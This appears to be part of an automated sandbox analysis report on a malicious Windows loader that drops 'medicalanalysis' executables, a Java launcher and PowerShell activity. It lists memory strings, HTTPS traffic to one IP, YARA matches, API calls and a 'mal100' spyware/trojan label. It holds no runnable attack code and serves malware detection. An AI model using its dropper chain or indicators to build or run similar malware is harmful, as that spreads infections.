                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/enableExtensionFunctions
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfoS
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfoS%
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimitQ
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit#
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimitM
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
                    Source: javaw.exe, 00000003.00000002.4543801058.0000000015C4B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335705359.0000000016B17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html
                    Source: javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#StaticLoggerBinder
                    Source: javaw.exe, 00000003.00000003.2335794856.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#StaticLoggerBinder&C
                    Source: javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#loggerNameMismatch
                    Source: javaw.exe, 00000003.00000003.2335794856.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#loggerNameMismatch&o
                    Source: javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#multiple_bindings
                    Source: javaw.exe, 00000003.00000002.4543801058.0000000015C4B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335794856.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#null_LF
                    Source: javaw.exe, 00000003.00000002.4543801058.0000000015C4B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335794856.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#replay
                    Source: javaw.exe, 00000003.00000002.4543801058.0000000015C4B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335705359.0000000016B17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#substituteLogger
                    Source: javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#unsuccessfulInit
                    Source: javaw.exe, 00000003.00000002.4543801058.0000000015C4B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335794856.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#version_mismatch
                    Source: javaw.exe, 00000003.00000003.2335705359.0000000016B17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.htmla3
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.apache.org/xalan
                    Source: javaw.exe, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2231217783.0000000015BEE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.apache.org/xslt
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD7
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entities
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entities7
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-parameter-entities
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-parameter-entities8
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes1
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces?
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2228038429.00000000159BB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000AA94000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.00000000159BE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.00000000159BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/string-interning
                    Source: javaw.exe, 00000003.00000003.2335885806.00000000159BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/string-interningfeature
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/validation
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/validation?
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/lexical-handler
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/xml-string
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/xml-string?
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                    Source: unknownHTTPS traffic detected: 5.2.81.126:443 -> 192.168.2.5:49736 version: TLS 1.2
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                    Source: Yara matchFile source: 16.3.svchost.exe.4af0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.3.svchost.exe.4d10000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.3.svchost.exe.4d10000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000003.2844637112.0000000004D10000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.2844199525.0000000004AF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile created: C:\Users\user\AppData\Local\Temp\TmpE988.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile created: C:\Users\user\AppData\Local\Temp\TmpE968.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_057D1D98 NtResumeThread,13_2_057D1D98
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_0571F6D8 NtProtectVirtualMemory,13_2_0571F6D8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_0571F6D0 NtProtectVirtualMemory,13_2_0571F6D0
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,12_2_00007FF7600A2C54
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,12_2_00007FF7600A1C0C
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0040737E0_2_0040737E
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406EFE0_2_00406EFE
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_004079A20_2_004079A2
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_004049A80_2_004049A8
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeCode function: 2_2_00405D302_2_00405D30
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeCode function: 2_2_004013B02_2_004013B0
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_1538608F3_3_1538608F
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04E9B4B87_2_04E9B4B8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04E9B4A87_2_04E9B4A8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08B33AA87_2_08B33AA8
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A1D2812_2_00007FF7600A1D28
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A5D9012_2_00007FF7600A5D90
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A2DB412_2_00007FF7600A2DB4
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A6CA412_2_00007FF7600A6CA4
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A66C412_2_00007FF7600A66C4
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A40C412_2_00007FF7600A40C4
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A353012_2_00007FF7600A3530
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A1C0C12_2_00007FF7600A1C0C
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05786E5B13_2_05786E5B
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_00A7179A13_2_00A7179A
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_00A737BA13_2_00A737BA
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_00A71A1F13_2_00A71A1F
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_00A72E2913_2_00A72E29
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_00A72E3813_2_00A72E38
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_00A737BA13_2_00A737BA
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_00A717C013_2_00A717C0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_04AA7DE913_2_04AA7DE9
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_04AA975B13_2_04AA975B
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_04AA5A2013_2_04AA5A20
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_04AADCF013_2_04AADCF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_04AADD0013_2_04AADD00
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_04AA59C113_2_04AA59C1
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_04AA5A1113_2_04AA5A11
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_04AA224913_2_04AA2249
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_04AA225813_2_04AA2258
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_0571BD4813_2_0571BD48
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_0571BD3B13_2_0571BD3B
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_058905F813_2_058905F8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05894B6013_2_05894B60
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_058915F113_2_058915F1
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_058906A813_2_058906A8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_0589616813_2_05896168
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05894E8713_2_05894E87
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_058C7B9813_2_058C7B98
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_058C653813_2_058C6538
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_058C654813_2_058C6548
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_058C043813_2_058C0438
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_058C044813_2_058C0448
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_058C808713_2_058C8087
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_058C7B8913_2_058C7B89
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_058C83DF13_2_058C83DF
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05A39DE013_2_05A39DE0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05A39DD013_2_05A39DD0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05A3D7A813_2_05A3D7A8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05A3CFC513_2_05A3CFC5
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05A3CF2813_2_05A3CF28
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05A3CF3813_2_05A3CF38
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05A3C1F713_2_05A3C1F7
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05A3D08413_2_05A3D084
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05A348F813_2_05A348F8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05A3EBF413_2_05A3EBF4
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05D3F07013_2_05D3F070
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05D3E52813_2_05D3E528
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05D2004013_2_05D20040
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 13_2_05D2000713_2_05D20007
                    Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 004062CF appears 58 times
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeCode function: String function: 00406E10 appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 348
                    Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Loader.exeStatic PE information: Section: .reloc ZLIB complexity 0.995849609375
                    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@58/347@12/13
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeCode function: 2_2_00401ED0 GetLastError,puts,ShellExecuteA,printf,fclose,MessageBoxA,FormatMessageA,strlen,strcat,LocalFree,fprintf,fprintf,fprintf,2_2_00401ED0
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,12_2_00007FF7600A1C0C
